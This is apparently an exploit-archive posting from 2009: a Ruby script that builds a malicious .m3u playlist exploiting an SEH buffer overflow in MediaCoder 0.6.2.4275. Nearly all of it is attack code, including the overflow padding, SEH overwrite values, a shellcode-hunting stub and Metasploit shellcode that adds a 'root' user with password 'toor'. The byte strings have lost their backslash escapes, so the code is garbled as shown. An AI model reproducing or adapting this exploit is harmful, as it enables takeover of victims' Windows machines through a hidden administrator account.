mediacoderuniversal-sehoverflow.txt
Posted on 10 March 2009
#!/usr/bin/env ruby # MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH) # Universal SEH Overwrite Exploit # By Stack # Mountassif Moad # Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe # cat Greatz.txt # Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z # Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d # ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support time3 = Time.new puts "Exploit Started in Current Time :" + time3.inspect puts "Enter Name For your File Like : Stack" files = gets.chomp.capitalize puts "Name Of File : " + files +'.m3u' time1 = Time.new $VERBOSE=nil Header = "x23x45x58x54x4Dx33x55x0Dx0Ax23x45x58x54x49x4Ex46"+ "x3Ax33x3Ax35x30x2Cx4Cx61x6Dx62x20x4Fx66x20x47x6F"+ "x64x20x2Dx20x53x65x74x20x54x6Fx20x46x61x69x6Cx20"+ "x0Dx0Ax44x3Ax5C" # win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com Shellscode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+ "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+ "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+ "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+ "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+ "x42x50x42x30x42x30x4bx38x45x54x4ex33x4bx38x4ex47"+ "x45x30x4ax57x41x50x4fx4ex4bx58x4fx54x4ax31x4bx48"+ "x4fx35x42x32x41x50x4bx4ex49x54x4bx58x46x53x4bx58"+ "x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c"+ "x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+ "x46x4fx4bx33x46x45x46x42x46x50x45x57x45x4ex4bx48"+ "x4fx55x46x42x41x30x4bx4ex48x56x4bx48x4ex50x4bx34"+ "x4bx48x4fx35x4ex31x41x30x4bx4ex4bx48x4ex41x4bx58"+ "x41x30x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53"+ "x42x4cx46x36x4bx38x42x44x42x53x45x38x42x4cx4ax57"+ "x4ex50x4bx38x42x54x4ex50x4bx58x42x57x4ex41x4dx4a"+ "x4bx38x4ax56x4ax30x4bx4ex49x30x4bx48x42x58x42x4b"+ "x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx35x41x53"+ "x48x4fx42x46x48x55x49x48x4ax4fx43x48x42x4cx4bx37"+ "x42x55x4ax56x42x4fx4cx58x46x50x4fx45x4ax36x4ax39"+ "x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x4dx46"+ "x46x56x50x52x45x36x4ax47x45x46x42x52x4fx32x43x46"+ "x42x52x50x56x45x56x46x37x42x52x45x57x43x57x45x46"+ "x44x37x42x32x44x47x4fx46x4fx56x46x37x42x32x46x37"+ "x4fx36x4fx56x44x57x42x52x4fx42x41x44x46x54x46x34"+ "x42x52x48x52x48x52x42x32x50x56x45x36x46x37x42x52"+ "x4ex36x4fx46x43x56x41x56x4ex36x47x36x44x57x4fx36"+ "x45x57x42x47x42x52x41x34x46x46x4dx36x49x46x50x56"+ "x49x36x43x47x46x47x44x37x41x36x46x57x4fx56x44x57"+ "x43x47x42x32x44x57x4fx56x4fx46x46x47x42x32x4fx32"+ "x41x54x46x54x46x54x42x50x5a" # Media_bruteforcer_shellcode Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode "xD0x62x43"+ # SHL BYTE PTR DS:[EDX+43],1 "x00xB8x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH "xBBxABx01"+ "x00x00"+ # ADD BYTE PTR DS:[EAX],AL "x00xF0"+ # ADD AL,DH "xFFx13"+ # CALL DWORD PTR DS:[EBX] "x00x4Fx6D"+ # ADD BYTE PTR DS:[EDI+6D],CL "x81x7Cx38x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92 "x92x7CxFF"+ "xFFxFF" + Shellscode Rhunter = "x5B"+ #POP EBX "x90" * 10 + # NOP x 10 "x90x90"+ # NOP NOP "x8Dx44xC1x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4] "x8Bx1E"+ # MOV EBX,DWORD PTR DS:[ESI] "x89x18"+ # MOV DWORD PTR DS:[EAX],EBX "x89x06"+ # MOV DWORD PTR DS:[ESI],EAX "x42"+ # INC EDX "x83xFAx64"+ # CMP EDX,64 "x75xEC"+ # JNZ SHORT dsp_chmx.0169127E "x8Bx06"+ # MOV EAX,DWORD PTR DS:[ESI] "x8Bx10"+ # MOV EDX,DWORD PTR DS:[EAX] "x89x16"+ # MOV DWORD PTR DS:[ESI],EDX "x5E"+ # POP ESI "x5B"+ # POP EBX "x93x43"+ # CALL ESP "x92x7c" Over = "x41" * 195 + "xffxffxffxff" + "x47" * 4 + "x42" * 6 + "xffxffx47x47x47xFFx65x78x77x76" Nop = "x90" * 8 Next_Seh = "xebx06xffxff" Seh = "x93xB6x98x7C" Nopsled = "x90" * 7 Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled File.open( files+".m3u", "w" ) do |the_file| the_file.puts(Xpl) puts "Exploit finished in Current Time :" + time1.inspect puts "Now Open " + files +".m3u :d" end
